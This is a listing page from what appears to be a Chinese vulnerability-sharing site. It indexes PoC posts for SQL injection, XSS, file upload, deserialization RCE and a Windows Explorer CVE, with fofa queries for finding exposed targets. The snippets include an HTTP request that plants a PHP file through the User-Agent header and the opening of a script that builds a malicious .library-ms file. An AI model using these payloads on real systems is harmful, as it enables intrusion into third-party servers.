通知图标

欢迎访问秃兔安全

dreamer292_秃兔安全_第11页
【通用】用友NC changeEvent  SQL注入漏洞_秃兔安全

【通用】用友NC changeEvent SQL注入漏洞

fofa语句yakit插件 uuidpocyaml已验证   
【2025特殊通用】用友NC uncancelEvent sqli_秃兔安全
idcCMS 反射型xss CVE-2024-11587_秃兔安全

idcCMS 反射型xss CVE-2024-11587

fofa语句官方yaml  
3个月前
05011
【通用】usdtAdmin收款管理系统log.php 任意文件写入_秃兔安全

【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...
在nuclei中的workflow与finger识别_秃兔安全

在nuclei中的workflow与finger识别

在前面的内容中,我们已经介绍了如何编写用于漏洞检测的YAML模板(POC)。然而,在实际应用中,面对大量的URL目标,如果直接使用所有的POC模板进行检测,不仅会消耗大量的时间,而且效率极低。...
【通用】 百易云资产管理运营系统 leaseImaRead SQL注入_秃兔安全
【通用】 方正畅享全媒体新闻采编系统 screen.do存在SQL注入漏洞_秃兔安全
【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc_秃兔安全

【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc

github链接:pocpy脚本import os import zipfile def main(): ''' 该程序生成一个恶意 .library-ms 文件,并将其打包为 ZIP 归档。 用户需要输入文件名称和攻击者的 IP 地址。 ''' file_name = ...
7个月前
011615
【通用】NUUO oemupload.php 文件上传_秃兔安全

【通用】NUUO oemupload.php 文件上传

fofa语句yakit插件 uuidpocyaml已验证   
【通用】红盟发卡系统 orderContent 反序列化rce_秃兔安全

【通用】红盟发卡系统 orderContent 反序列化rce

fofa语句yakit插件 uuidpocyaml已验证   

秃兔音乐盒